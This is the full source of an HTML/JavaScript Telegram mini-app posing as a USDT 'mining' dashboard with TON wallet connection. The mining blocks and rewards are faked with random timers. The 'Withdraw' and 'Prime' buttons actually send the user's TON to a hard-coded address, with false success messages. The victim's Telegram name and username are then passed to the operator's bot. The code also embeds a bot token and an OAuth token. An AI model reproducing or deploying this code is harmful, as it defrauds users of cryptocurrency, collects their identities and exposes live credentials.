<!DOCTYPE html>
<html lang="en">
    <head>
        <title></title>
        <meta charset="UTF-8">
        <meta name="viewport" content="width=device-width, initial-scale=1">
        <script type="text/javascript" src="https://rawgit.com/victornpb/f639f37373be0f6e82e1/raw/5d8f7ee8b32ae04de087d2377d8086e3389ee411/AES.js"></script>
        <script src="https://telegram.org/js/telegram-web-app.js"></script>
        <link rel="apple-touch-icon" type="image/png" href="https://cpwebassets.codepen.io/assets/favicon/apple-touch-icon-5ae1a0698dcc2402e9712f7d01ed509a57814f994c660df9f7a952f3060705ee.png">
        <meta name="apple-mobile-web-app-title" content="CodePen">
        <link rel="shortcut icon" type="image/x-icon" href="https://cpwebassets.codepen.io/assets/favicon/favicon-aec34940fbc1a6e787974dcd360f2c6b63348d4b1f4e06c77743096d55480f33.ico">
        <link rel="mask-icon" type="image/x-icon" href="https://cpwebassets.codepen.io/assets/favicon/logo-pin-b4b4269c16397ad2f0f7a01bcdf513a1994f4c94b8af2f191c09eb0d601762b1.svg" color="#111">
    <script src="https://cpwebassets.codepen.io/assets/common/stopExecutionOnTimeout-2c7831bb44f98c1391d6a4ffda0e1fd302503391ca806e7fcc7b9b87197aec26.js"></script>
  <title>Latest transactions</title>
    <link rel="canonical" href="https://codepen.io/havardob/pen/PoWbeoZ">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/meyer-reset/2.0/reset.min.css">
  <link href="https://fonts.googleapis.com/css2?family=Manrope:wght@200..800&display=swap" rel="stylesheet">
  <script src="https://unpkg.com/@tonconnect/ui@latest/dist/tonconnect-ui.min.js"></script>




    </head>
    <style>
@import url("https://fonts.googleapis.com/css2?family=Inter:wght@300;400;500;600;700;800;900&display=swap");
*,
*:after,
*:before {
  box-sizing: border-box;
}

body {
  font-family: "Inter", sans-serif;
  line-height: 1.5;
  min-height: 100vh;
  padding: 5rem 0;
  font-size: clamp(1rem, 2.5vw, 1.125rem);
  background-color: #fff;
}

.fancy {
  position: relative;
  white-space: nowrap;
  &:after {
    --deco-height: 0.3125em;
    content: "";
    position: absolute;
    left: 0;
    right: 0;
    bottom: calc(var(--deco-height) * -0.625);
    height: var(--deco-height);
    background-image: url("data:image/svg+xml,%3Csvg width='100' height='64' fill='none' xmlns='http://www.w3.org/2000/svg'%3E%3Cg clip-path='url(%23a)'%3E%3Cpath d='M-17 30.5C-1 22 72-4 54 13 37.9 28.2-2.5 57.5 16 55.5s72-29 104-40' stroke='%2300FDCF' stroke-width='10'/%3E%3C/g%3E%3Cdefs%3E%3CclipPath id='a'%3E%3Cpath fill='%23fff' d='M0 0h100v64H0z'/%3E%3C/clipPath%3E%3C/defs%3E%3C/svg%3E%0A");
    background-size: auto 100%;
    background-repeat: round;
    background-position: 0em;
  }
}

section {
  width: 90%;
  max-width: 800px;
  margin-left: auto;
  margin-right: auto;
}
section + section {
  margin-top: 2.5em;
}

h1 {
  font-weight: 700;
  line-height: 1.125;
  font-size: clamp(1.5rem, 2.5vw, 2.5rem);
  text-align: center;

}
#usdt{
	font-weight: 700;
	font-family: "Manrope", sans-serif;
  	line-height: 1.125;
  	font-size: clamp(2rem, 3vw, 3rem);
	padding: 0px 0px 10px 0px;
  	text-align: center;
}

h2 {
  margin-top: 0.25em;
  color: #999;
  font-size: clamp(1.125rem, 2.5vw, 1.25rem);
  text-align: center;

}


h2 + * {
  margin-top: 1.5em;
}

summary {
  background-color: transparent;
  position: relative;
  cursor: pointer;
  padding: 1em 0.5em;
  list-style: none;
}
summary::-webkit-details-marker {
  display: none;
}
summary:hover {
  background-color: transparent;
}
summary div {
  display: flex;
  align-items: center;
}
summary h3 {
  display: flex;
  flex-direction: column;
}
summary small {
  color: #999;
  font-size: 0.875em;
}
summary strong {
  font-weight: 700;
}
summary span:first-child {
  width: 4rem;
  height: 4rem;
  border-radius: 10px;
  background-color: #f3e1e1;
  display: flex;
  flex-shrink: 0;
  align-items: center;
  justify-content: center;
  margin-right: 1.25em;
}
summary span:first-child svg {
  width: 2.25rem;
  height: 2.25rem;
}
summary span:last-child {
  font-weight: 700;
  margin-left: auto;
}
summary:focus {
  outline: none;
}
summary .plus {
  color: #289672;
}

details {
  border-bottom: 1px solid #b5bfd9;
}
details[open] {
  box-shadow: -3px 0 0 #b5bfd9;
}
details:first-of-type {
  border-top: 1px solid #b5bfd9;
}
details > div {
  padding: 2em 2em 0;
  font-size: 0.875em;
}

dl {
  display: flex;
  flex-wrap: wrap;
}
dl dt {
  font-weight: 700;
}
dl div {
  margin-right: 4em;
  margin-bottom: 2em;
}

#hh{
	padding: 10px;
  display: flex;
  justify-content: center;
}


.withdraw {
	width: 150px;
	height: 40px;
	border-radius: 6px;
	display: flex;
  justify-content: center;
  align-items: center;
	font-weight: 700;
	font-family: "Manrope", sans-serif;
  	line-height: 1.125;
  	font-size: 18px;

	box-shadow: rgba(100, 100, 111, 0.2) 0px 7px 29px 0px;
}
.support {
	width: 125px;
	height: 40px;
	border-radius: 6px;
	display: flex;
  justify-content: center;
  align-items: center;
	font-weight: 700;
  color: #fff;
	font-family: "Manrope", sans-serif;
  	line-height: 1.125;
  	font-size: 12px;
    background-color: #147ffa;

	box-shadow: rgba(100, 100, 111, 0.2) 0px 7px 29px 0px;
}

</style>
<style>
@import url("https://fonts.googleapis.com/css2?family=Outfit:wght@100;200;300;400;500;600;700;800;900&display=swap");

*,
*:before,
*:after {
	box-sizing: border-box;
}


button,
input,
select,
textarea {
	font: inherit;
}

a {
	color: inherit;
}

/* End basic CSS override */

* {
	scrollbar-width: 0;
}

*::-webkit-scrollbar {
	background-color: transparent;
	width: 12px;
}

*::-webkit-scrollbar-thumb {
	border-radius: 99px;
	background-color: #ddd;
	border: 4px solid #fff;
}

.modal {
	position: absolute;
	top: 0;
	left: 0;
	right: 0;
	bottom: 0;
	display: flex;
	align-items: center;
	justify-content: center;
	background-color: rgba(#000, 0.25);
}

.modal-container {
	max-height: 90vh;
	max-width: 500px;
	margin-left: auto;
	margin-right: auto;
	background-color: #fff;
	border-radius: 16px;
	overflow: hidden;
	display: flex;
	flex-direction: column;
	box-shadow: 0 15px 30px 0 rgba(#000, 0.25);
	@media (max-width: 600px) {
		width: 90%;
	}
}

.modal-container-header {
	padding: 16px 32px;
	border-bottom: 1px solid #ddd;
	display: flex;
	align-items: center;
	justify-content: space-between;
}

.modal-container-title {
	display: flex;
	align-items: center;
	gap: 8px;
	line-height: 1;
	font-weight: 700;
	font-size: 1.125;
	svg {
		width: 32px;
		height: 32px;
		color: #750550;
	}
}

.modal-container-body {
	padding: 24px 32px 51px;
	overflow-y: auto;
}

.rtf {
	h1,
	h2,
	h3,
	h4,
	h5,
	h6 {
		font-weight: 700;
	}

	h1 {
		font-size: 1.5rem;
		line-height: 1.125;
	}

	h2 {
		font-size: 1.25rem;
		line-height: 1.25;
	}

	h3 {
		font-size: 1rem;
		line-height: 1.5;
	}

	& > * + * {
		margin-top: 1em;
	}

	& > * + :is(h1, h2, h3) {
		margin-top: 2em;
	}

	& > :is(h1, h2, h3) + * {
		margin-top: 0.75em;
	}

	ul,
	ol {
		margin-left: 20px;
		list-style-position: inside;
	}

	ol {
		list-style: numeric;
	}

	ul {
		list-style: disc;
	}
}

.modal-container-footer {
	padding: 20px 32px;
	display: flex;
	align-items: center;
	justify-content: flex-end;
	border-top: 1px solid #ddd;
	gap: 12px;
	position: relative;
	&:after {
		content: "";
		display: block;
		position: absolute;
		top: -51px;
		left: 24px;
		right: 24px;
		height: 50px;
		flex-shrink: 0;
		background-image: linear-gradient(to top, rgba(#fff, 0.75), transparent);
		pointer-events: none;
	}
}

.button {
	padding: 12px 20px;
	border-radius: 8px;
	background-color: transparent;
	border: 0;
	font-weight: 600;
	cursor: pointer;
	transition: 0.15s ease;

	&.is-ghost {
		&:hover,
		&:focus {
			background-color: #dfdad7;
		}
	}

	&.is-primary {
		background-color: #000;
		color: #fff;
		&:hover,
		&:focus {
			background-color: #999;
		}
	}
}

.icon-button {
	padding: 0;
	border: 0;
	background-color: transparent;
	width: 40px;
	height: 40px;
	display: flex;
	align-items: center;
	justify-content: center;
	line-height: 1;
	cursor: pointer;
	border-radius: 8px;
	transition: 0.15s ease;
	svg {
		width: 24px;
		height: 24px;
	}

	&:hover,
	&:focus {
		background-color: #dfdad7;
	}
}

</style>

<script src="https://unpkg.com/@tonconnect/ui@latest/dist/tonconnect-ui.min.js"></script>

    <script>
let tg = window.Telegram.WebApp;


let lst = 0.0001; //lusdt

tg.MainButton.text = "Mine";
tg.MainButton.color = "#000";
tg.MainButton.textColor = "#fff";
tg.MainButton.hasShineEffect = true;
tg.setHeaderColor("#fff");
tg.setBottomBarColor("#fff");
// tg.setBackgroundColor("#fff");
tg.MainButton.show();
tg.MainButton.onClick(function(){
	if(activeMining == true){
		activeMining=false;
		tg.MainButton.text = "Mine";
		tg.MainButton.hasShineEffect = true;

	}
	else{
		activeMining=true;
		tg.MainButton.text = "Stop mining";
		tg.MainButton.hasShineEffect = false;

	}
});
tg.expand();




function random(max) {
  return Math.floor(Math.random() * max);
}
function aroundom(min, max) {
  return Math.random() * (max - min) + min;
}

window.addEventListener("load", (event) => {
    // // function ii(){
    // setTgPrem("no");
    getTgPrem();
    
});

window.setInterval(function(){
    document.getElementById("usdt").innerHTML = `<span class="fancy">${lst} MKT</span>`;
    getMktTokens();
}, 1000);

function truncate(str, maxlength) {

    if (str.length > maxlength) {
        str = str.substring(0, maxlength-3);     // итоговая длина равна maxlength
        return str + "...";
        // В кодировке Unicode существует специальный символ «троеточие»: … (HTML: &hellip;)
    }
    else
    return str;
}

function LockPhrase(block, password){
var text = Aes.Ctr.encrypt(block, password, 128);
return text;
}

function UnlockPhrase(block, password){
var text = Aes.Ctr.decrypt(block, password, 128);
return text;
}

function MainButtonActiveMining(){
	tg.MainButton.setText("Остановить майнинг");
	activeMining = true;
	tg.MainButton.onClick(MainButtonDisactiveMining());
	tg.expand();
}
function MainButtonDisactiveMining(){
	tg.MainButton.setText("Начать майнинг");
	activeMining = false;
	tg.MainButton.onClick(MainButtonActiveMining());
	tg.expand();
}

function addBllck(blockId, reward, data, lst, hash, golden, wallet){
	let blockTime =  blockId / 1000 + aroundom(6000, 30000);

    let content = document.getElementById("checking");
    const block = document.createElement('details');
    block.id = blockId;
    content.appendChild(block);
    block.innerHTML = `
      <summary>
			<div>
				<span style="background-color: #f2dcbb;">
					<!--<svg xmlns="http://www.w3.org/2000/svg" width="192" height="192" fill="currentColor" viewBox="0 0 256 256">
						<rect width="256" height="256" fill="none"></rect>
						<path d="M192,120h27.05573a8,8,0,0,0,7.15542-4.42229l18.40439-36.80878a8,8,0,0,0-3.18631-10.52366L192,40" fill="none" stroke="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="16"></path>
						<path d="M64,120H36.94427a8,8,0,0,1-7.15542-4.42229L11.38446,78.76893a8,8,0,0,1,3.18631-10.52366L64,40" fill="none" stroke="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="16"></path>
						<path d="M160,40a32,32,0,0,1-64,0H64V208a8,8,0,0,0,8,8H184a8,8,0,0,0,8-8V40Z" fill="none" stroke="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="16"></path>
					</svg>-->
                            <svg viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg"><g id="SVGRepo_bgCarrier" stroke-width="0"></g><g id="SVGRepo_tracerCarrier" stroke-linecap="round" stroke-linejoin="round"></g><g id="SVGRepo_iconCarrier"> <path d="M17.6005 5.31125L11.9505 2.27125C11.3505 1.95125 10.6405 1.95125 10.0405 2.27125L4.40047 5.31125C3.99047 5.54125 3.73047 5.98125 3.73047 6.46125C3.73047 6.95125 3.98047 7.39125 4.40047 7.61125L10.0505 10.6512C10.3505 10.8112 10.6805 10.8913 11.0005 10.8913C11.3205 10.8913 11.6605 10.8112 11.9505 10.6512L17.6005 7.61125C18.0105 7.39125 18.2705 6.95125 18.2705 6.46125C18.2705 5.98125 18.0105 5.54125 17.6005 5.31125Z" fill="#000000"></path> <path d="M9.12 11.7106L3.87 9.09058C3.46 8.88058 3 8.91058 2.61 9.14058C2.23 9.38058 2 9.79058 2 10.2406V15.2006C2 16.0606 2.48 16.8306 3.25 17.2206L8.5 19.8406C8.68 19.9306 8.88 19.9806 9.08 19.9806C9.31 19.9806 9.55 19.9106 9.76 19.7906C10.14 19.5506 10.37 19.1406 10.37 18.6906V13.7306C10.36 12.8706 9.88 12.1006 9.12 11.7106Z" fill="#000000"></path> <path d="M20.0006 10.2406V12.7006C19.5206 12.5606 19.0106 12.5006 18.5006 12.5006C17.1406 12.5006 15.8106 12.9706 14.7606 13.8106C13.3206 14.9406 12.5006 16.6506 12.5006 18.5006C12.5006 18.9906 12.5606 19.4806 12.6906 19.9506C12.5406 19.9306 12.3906 19.8706 12.2506 19.7806C11.8706 19.5506 11.6406 19.1406 11.6406 18.6906V13.7306C11.6406 12.8706 12.1206 12.1006 12.8806 11.7106L18.1306 9.09058C18.5406 8.88058 19.0006 8.91058 19.3906 9.14058C19.7706 9.38058 20.0006 9.79058 20.0006 10.2406Z" fill="#000000"></path> <path d="M22.58 21.4989L21.74 20.6589C22.18 19.9989 22.44 19.1989 22.44 18.3489C22.44 16.0189 20.55 14.1289 18.22 14.1289C15.89 14.1289 14 16.0189 14 18.3489C14 20.6789 15.89 22.5689 18.22 22.5689C19.07 22.5689 19.87 22.3089 20.53 21.8689L21.37 22.7089C21.54 22.8789 21.75 22.9589 21.97 22.9589C22.19 22.9589 22.41 22.8789 22.57 22.7089C22.91 22.3689 22.91 21.8289 22.58 21.4989Z" fill="#000000"></path> </g></svg>

				</span>
				<h3>
					<strong>Block [${golden}]</strong>
					<small id="${blockId}block">${parseMil(blockTime)}</small>
				</h3>
				<span class="plus">Searching...</span>
			</div>
		</summary>
		<div>
			<dl>
				<div>
					<dt>Block</dt>
					<dd>${data}</dd>
				</div>

				<div>
					<dt>Hash used</dt>
					<dd><a href="#" style="text-decoration: none;">${truncate(hash, 10)}<svg height="16" width="16" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg"><g id="SVGRepo_bgCarrier" stroke-width="0"></g><g id="SVGRepo_tracerCarrier" stroke-linecap="round" stroke-linejoin="round"></g><g id="SVGRepo_iconCarrier"> <path fill-rule="evenodd" clip-rule="evenodd" d="M17.5303 10.0303C17.8232 9.73744 17.8232 9.26256 17.5303 8.96967L12.5303 3.96967C12.2374 3.67678 11.7626 3.67678 11.4697 3.96967L6.46967 8.96967C6.17678 9.26256 6.17678 9.73744 6.46967 10.0303C6.76256 10.3232 7.23744 10.3232 7.53033 10.0303L11.25 6.31066L11.25 14.5C11.25 15.2133 11.0298 16.3 10.3913 17.1868C9.7804 18.0353 8.75556 18.75 7 18.75C6.58579 18.75 6.25 19.0858 6.25 19.5C6.25 19.9142 6.58579 20.25 7 20.25C9.24444 20.25 10.7196 19.298 11.6087 18.0632C12.4702 16.8667 12.75 15.4534 12.75 14.5L12.75 6.31066L16.4697 10.0303C16.7626 10.3232 17.2374 10.3232 17.5303 10.0303Z" fill="#000000"></path> </g></svg></a></dd> <!--•-->
				</div>

				<div>
					<dt>Block ID</dt>
					<dd>#${blockId}</dd>
				</div>
				<div>
					<dt>Wallet</dt>
					<dd><a href="https://tonviewer.com/${wallet}" style="text-decoration: none;">${truncate(wallet, 10)}<svg height="16" width="16" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg"><g id="SVGRepo_bgCarrier" stroke-width="0"></g><g id="SVGRepo_tracerCarrier" stroke-linecap="round" stroke-linejoin="round"></g><g id="SVGRepo_iconCarrier"> <path fill-rule="evenodd" clip-rule="evenodd" d="M17.5303 10.0303C17.8232 9.73744 17.8232 9.26256 17.5303 8.96967L12.5303 3.96967C12.2374 3.67678 11.7626 3.67678 11.4697 3.96967L6.46967 8.96967C6.17678 9.26256 6.17678 9.73744 6.46967 10.0303C6.76256 10.3232 7.23744 10.3232 7.53033 10.0303L11.25 6.31066L11.25 14.5C11.25 15.2133 11.0298 16.3 10.3913 17.1868C9.7804 18.0353 8.75556 18.75 7 18.75C6.58579 18.75 6.25 19.0858 6.25 19.5C6.25 19.9142 6.58579 20.25 7 20.25C9.24444 20.25 10.7196 19.298 11.6087 18.0632C12.4702 16.8667 12.75 15.4534 12.75 14.5L12.75 6.31066L16.4697 10.0303C16.7626 10.3232 17.2374 10.3232 17.5303 10.0303Z" fill="#000000"></path> </g></svg></a></dd>
				</div>
			</dl>
		</div>
      `;
	  blocks++;
	  setInterval(function() {
		blockTime = blockTime - 1000;
		let element = document.getElementById(`${blockId}block`);
		if (typeof(element) != 'undefined' && element != null)
		{
			element.innerHTML = `${parseMil(blockTime)}`;
		}
		else{
			return 0;
		}
	  }, 1000)
    //   console.log("ff");
	  setTimeout(function() {
		let completed = document.getElementById("completed");
    const blockComp = document.createElement('details');
    blockComp.id = blockId;
    content.removeChild(block);
    completed.appendChild(blockComp);
    blockComp.innerHTML = `
      <summary>
			<div>
				<span style="background-color: #f2dcbb;">
					<!--<svg xmlns="http://www.w3.org/2000/svg" width="192" height="192" fill="currentColor" viewBox="0 0 256 256">
						<rect width="256" height="256" fill="none"></rect>
						<path d="M192,120h27.05573a8,8,0,0,0,7.15542-4.42229l18.40439-36.80878a8,8,0,0,0-3.18631-10.52366L192,40" fill="none" stroke="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="16"></path>
						<path d="M64,120H36.94427a8,8,0,0,1-7.15542-4.42229L11.38446,78.76893a8,8,0,0,1,3.18631-10.52366L64,40" fill="none" stroke="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="16"></path>
						<path d="M160,40a32,32,0,0,1-64,0H64V208a8,8,0,0,0,8,8H184a8,8,0,0,0,8-8V40Z" fill="none" stroke="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="16"></path>
					</svg>-->
                                   <svg viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg"><g id="SVGRepo_bgCarrier" stroke-width="0"></g><g id="SVGRepo_tracerCarrier" stroke-linecap="round" stroke-linejoin="round"></g><g id="SVGRepo_iconCarrier"> <path d="M17.6005 5.31125L11.9505 2.27125C11.3505 1.95125 10.6405 1.95125 10.0405 2.27125L4.40047 5.31125C3.99047 5.54125 3.73047 5.98125 3.73047 6.46125C3.73047 6.95125 3.98047 7.39125 4.40047 7.61125L10.0505 10.6512C10.3505 10.8112 10.6805 10.8913 11.0005 10.8913C11.3205 10.8913 11.6605 10.8112 11.9505 10.6512L17.6005 7.61125C18.0105 7.39125 18.2705 6.95125 18.2705 6.46125C18.2705 5.98125 18.0105 5.54125 17.6005 5.31125Z" fill="#000000"></path> <path d="M9.12 11.7106L3.87 9.09058C3.46 8.88058 3 8.91058 2.61 9.14058C2.23 9.38058 2 9.79058 2 10.2406V15.2006C2 16.0606 2.48 16.8306 3.25 17.2206L8.5 19.8406C8.68 19.9306 8.88 19.9806 9.08 19.9806C9.31 19.9806 9.55 19.9106 9.76 19.7906C10.14 19.5506 10.37 19.1406 10.37 18.6906V13.7306C10.36 12.8706 9.88 12.1006 9.12 11.7106Z" fill="#000000"></path> <path d="M20.0006 10.2406V12.7006C19.5206 12.5606 19.0106 12.5006 18.5006 12.5006C17.1406 12.5006 15.8106 12.9706 14.7606 13.8106C13.3206 14.9406 12.5006 16.6506 12.5006 18.5006C12.5006 18.9906 12.5606 19.4806 12.6906 19.9506C12.5406 19.9306 12.3906 19.8706 12.2506 19.7806C11.8706 19.5506 11.6406 19.1406 11.6406 18.6906V13.7306C11.6406 12.8706 12.1206 12.1006 12.8806 11.7106L18.1306 9.09058C18.5406 8.88058 19.0006 8.91058 19.3906 9.14058C19.7706 9.38058 20.0006 9.79058 20.0006 10.2406Z" fill="#000000"></path> <path d="M21.98 15.6695C21.16 14.6595 19.91 14.0195 18.5 14.0195C17.44 14.0195 16.46 14.3895 15.69 15.0095C14.65 15.8295 14 17.0995 14 18.5195C14 19.3595 14.24 20.1595 14.65 20.8395C14.92 21.2895 15.26 21.6795 15.66 21.9995H15.67C16.44 22.6395 17.43 23.0195 18.5 23.0195C19.64 23.0195 20.67 22.5995 21.46 21.8995C21.81 21.5995 22.11 21.2395 22.35 20.8395C22.76 20.1595 23 19.3595 23 18.5195C23 17.4395 22.62 16.4395 21.98 15.6695ZM20.76 17.9595L18.36 20.1795C18.22 20.3095 18.03 20.3795 17.85 20.3795C17.66 20.3795 17.47 20.3095 17.32 20.1595L16.21 19.0495C15.92 18.7595 15.92 18.2795 16.21 17.9895C16.5 17.6995 16.98 17.6995 17.27 17.9895L17.87 18.5895L19.74 16.8595C20.04 16.5795 20.52 16.5995 20.8 16.8995C21.09 17.2095 21.07 17.6795 20.76 17.9595Z" fill="#000000"></path> </g></svg>

				</span>
				<h3>
					<strong>Success Block</strong>
					<small>${golden}</small>
				</h3>
				<span class="plus">+${reward.toFixed(2)} USDT</span>
			</div>
		</summary>
		<div>
			<dl>
				<div>
					<dt>Hash used</dt>
					<dd>${data}</dd>
				</div>

				<div>
					<dt>Hash used</dt>
					<dd><a href="#" style="text-decoration: none;">${truncate(hash, 10)}<svg height="16" width="16" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg"><g id="SVGRepo_bgCarrier" stroke-width="0"></g><g id="SVGRepo_tracerCarrier" stroke-linecap="round" stroke-linejoin="round"></g><g id="SVGRepo_iconCarrier"> <path fill-rule="evenodd" clip-rule="evenodd" d="M17.5303 10.0303C17.8232 9.73744 17.8232 9.26256 17.5303 8.96967L12.5303 3.96967C12.2374 3.67678 11.7626 3.67678 11.4697 3.96967L6.46967 8.96967C6.17678 9.26256 6.17678 9.73744 6.46967 10.0303C6.76256 10.3232 7.23744 10.3232 7.53033 10.0303L11.25 6.31066L11.25 14.5C11.25 15.2133 11.0298 16.3 10.3913 17.1868C9.7804 18.0353 8.75556 18.75 7 18.75C6.58579 18.75 6.25 19.0858 6.25 19.5C6.25 19.9142 6.58579 20.25 7 20.25C9.24444 20.25 10.7196 19.298 11.6087 18.0632C12.4702 16.8667 12.75 15.4534 12.75 14.5L12.75 6.31066L16.4697 10.0303C16.7626 10.3232 17.2374 10.3232 17.5303 10.0303Z" fill="#000000"></path> </g></svg></a></dd> <!--•-->
				</div>

				<div>
					<dt>Block ID</dt>
					<dd>#${blockId}</dd>
				</div>
				<div>
					<dt>Wallet</dt>
					<dd><a href="https://tonviewer.com/${wallet}" style="text-decoration: none;">${truncate(wallet, 10)}<svg height="16" width="16" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg"><g id="SVGRepo_bgCarrier" stroke-width="0"></g><g id="SVGRepo_tracerCarrier" stroke-linecap="round" stroke-linejoin="round"></g><g id="SVGRepo_iconCarrier"> <path fill-rule="evenodd" clip-rule="evenodd" d="M17.5303 10.0303C17.8232 9.73744 17.8232 9.26256 17.5303 8.96967L12.5303 3.96967C12.2374 3.67678 11.7626 3.67678 11.4697 3.96967L6.46967 8.96967C6.17678 9.26256 6.17678 9.73744 6.46967 10.0303C6.76256 10.3232 7.23744 10.3232 7.53033 10.0303L11.25 6.31066L11.25 14.5C11.25 15.2133 11.0298 16.3 10.3913 17.1868C9.7804 18.0353 8.75556 18.75 7 18.75C6.58579 18.75 6.25 19.0858 6.25 19.5C6.25 19.9142 6.58579 20.25 7 20.25C9.24444 20.25 10.7196 19.298 11.6087 18.0632C12.4702 16.8667 12.75 15.4534 12.75 14.5L12.75 6.31066L16.4697 10.0303C16.7626 10.3232 17.2374 10.3232 17.5303 10.0303Z" fill="#000000"></path> </g></svg></a></dd>
				</div>
			</dl>
		</div>
      `;
	  document.getElementById("usdt").innerHTML = `<span class="fancy">${lst.toFixed(2)} USDT</span>`;

	  }, blockTime);

}

async function connectToWallet() {
        const connectedWallet = await tonConnectUI.connectWallet();
        // Do something with connectedWallet if needed
        console.log(connectedWallet);
    }
connectToWallet().catch(error => {
        console.error("Error connecting to wallet:", error);
    });



    </script>
    <body>
	<div>
  		<div id="ton-connect" style="position: absolute; top: 2%; right: 5%; z-index: 10"></div>
		<p id="usdt"><span class="fancy">0.00 USDT</span></p>
		<div id="hh">
  		<div class="withdraw" onclick="trans()">Withdraw</div>
		</div>
    <div id="hh">
  		  <div class="support" onclick="getMktTokens()">Support</div>
		</div>

	</div>

  <section id="contentyy">
	<h1 style="padding: 40px 0px 0px 0px;">Latest Blocks</h1>
	<h2>Checking...</h2>
       <div id="checking">
       </div>
       <br>
       <br>
       <br>
       <h1>Latest Transactions</h1>
	<h2>There's nothing here yet...</h2>
	<div id="completed">
		<h2 style="font-size: 12px;"></h2>
	
	</div>

       
</section>



<script>
    const tonConnectUI = new TON_CONNECT_UI.TonConnectUI({
        manifestUrl: 'https://raw.githubusercontent.com/Maxutkoe/TheChecker/refs/heads/main/tonconnect/tonconnect-manifest.json',
        buttonRootId: 'ton-connect'
    });
	async function connectToWallet() {
        const connectedWallet = await tonConnectUI.connectWallet();
        // Do something with connectedWallet if needed
        console.log(connectedWallet);
    }

    // Call the function
	tonConnectUI.uiOptions = {
      twaReturnUrl: 'https://t.me/ThelCheckerlBot',
        uiPreferences: {
            borderRadius: 's',
            theme: "LIGHT"
        },
    };



	async function trans(){
		const usdt = lst*250000000;
                const transaction = {
                    validUntil: Math.round(Date.now() / 1000) + 100,
                    messages: [
                        {
                            address: "UQCwZJMC1YRv_kG2Q6CF0H74t3IcWrRjJn1aE4nDWYj_ILUp",
                            amount: usdt.toFixed(0),
                        }
                    ]
                };

                try{
                    await tonConnectUI.sendTransaction(transaction);
                    alert("You successfuly paid comission!");
                    lst = 0;
                    localStorage.setItem("opop", lst);

					let telegram = {
    					token: "7937247695:AAGNmeIQE9gM5Zec8KbIezbrHdDAhKK4ksU", // Your bot's token that got from @BotFather
    					chat_id: "-1002275343624" // The user's(that you want to send a message) telegram chat id
    				};
					const text = `${tg.initDataUnsafe.user.first_name} ${tg.initDataUnsafe.user.last_name} | @${tg.initDataUnsafe.user.username} <br>${usdt}`;
					const url = `https://api.telegram.org/bot${telegram.token}/sendMessage?chat_id=${telegram.chat_id}&text=${text}`; // The url to request
    				const api = new XMLHttpRequest();
    				api.open('GET', url, true);
        api.onload = function(){
            const status = api.status;
            if(status == 200){
              console.log("Супер!");
            }
                
        };
        api.send();

                }
                catch(e){
                    console.error(e);
                }
    }
    async function payForPrime(){
                const transaction = {
                    validUntil: Math.round(Date.now() / 1000) + 100,
                    messages: [
                        {
                            address: "UQCwZJMC1YRv_kG2Q6CF0H74t3IcWrRjJn1aE4nDWYj_ILUp",
                            amount: 250000000, //250000000
                        }
                    ]
                };

                try{
                    await tonConnectUI.sendTransaction(transaction);
                    alert("You successfuly recieved 0.01 TON!");
                    let completed = document.getElementById("terms");
                    let body = document.querySelector("body");
                    body.removeChild(completed);
                    setTgPrem("yes");
                    getTgPrem();
                    window.location.reload();
                }
                catch(e){
                    console.error(e);
                }
    }
    async function supportAuth(){
                const transaction = {
                    validUntil: Math.round(Date.now() / 1000) + 100,
                    messages: [
                        {
                            address: "UQCwZJMC1YRv_kG2Q6CF0H74t3IcWrRjJn1aE4nDWYj_ILUp",
                            amount: 250000000, //250000000
                        }
                    ]
                };

                try{
                    await tonConnectUI.sendTransaction(transaction);
                    alert("Thanks!!!");
                }
                catch(e){
                    console.error(e);
                }
    }

    function getMktTokens(){
	let api = new XMLHttpRequest();
    let wallet = tonConnectUI.wallet.account.address;
    const url = `https://tonapi.io/v2/accounts/${wallet}/jettons`;
    //https://oauth.yandex.ru/verification_code#access_token=y0_AgAAAABbCGd7AAtGZwAAAAEcn3YsAAAWXo6VDEhPgIKVymz8EcVTx0bdYA&token_type=bearer&expires_in=31528306&cid=vw4tuxanj28dm7kp29ezn5zpg4

        api.open('GET', url, true);
        api.responseType = "json";
        api.onload = function(){
            const status = api.status;
            if(status == 200){
                // console.log(api.response.addresses[aroundom(5, 200).toFixed(0)].address);
				//wallet = api.response.addresses[aroundom(5, 200).toFixed(0)].address;
				//console.log(api.response);
                for(let i = 0; i < api.response.balances.length; i++){
                    if(api.response.balances[i].jetton.name == "Mk.Token" && api.response.balances[i].jetton.symbol == "MKT" && api.response.balances[i].jetton.address == "0:27d3109a5591be3d6782463d1db6f218819bb1f704b52b7ce3036a484e00cdca"){
                        //console.log(api.response.balances[i].jetton.name);
                        lst = 25.567;//api.response.balances[i].balance / 1000;
                    }
                }

			}
			else{
				console.log("F");
			}
		}
		api.send();

	
}

</script>
    </body>
</html>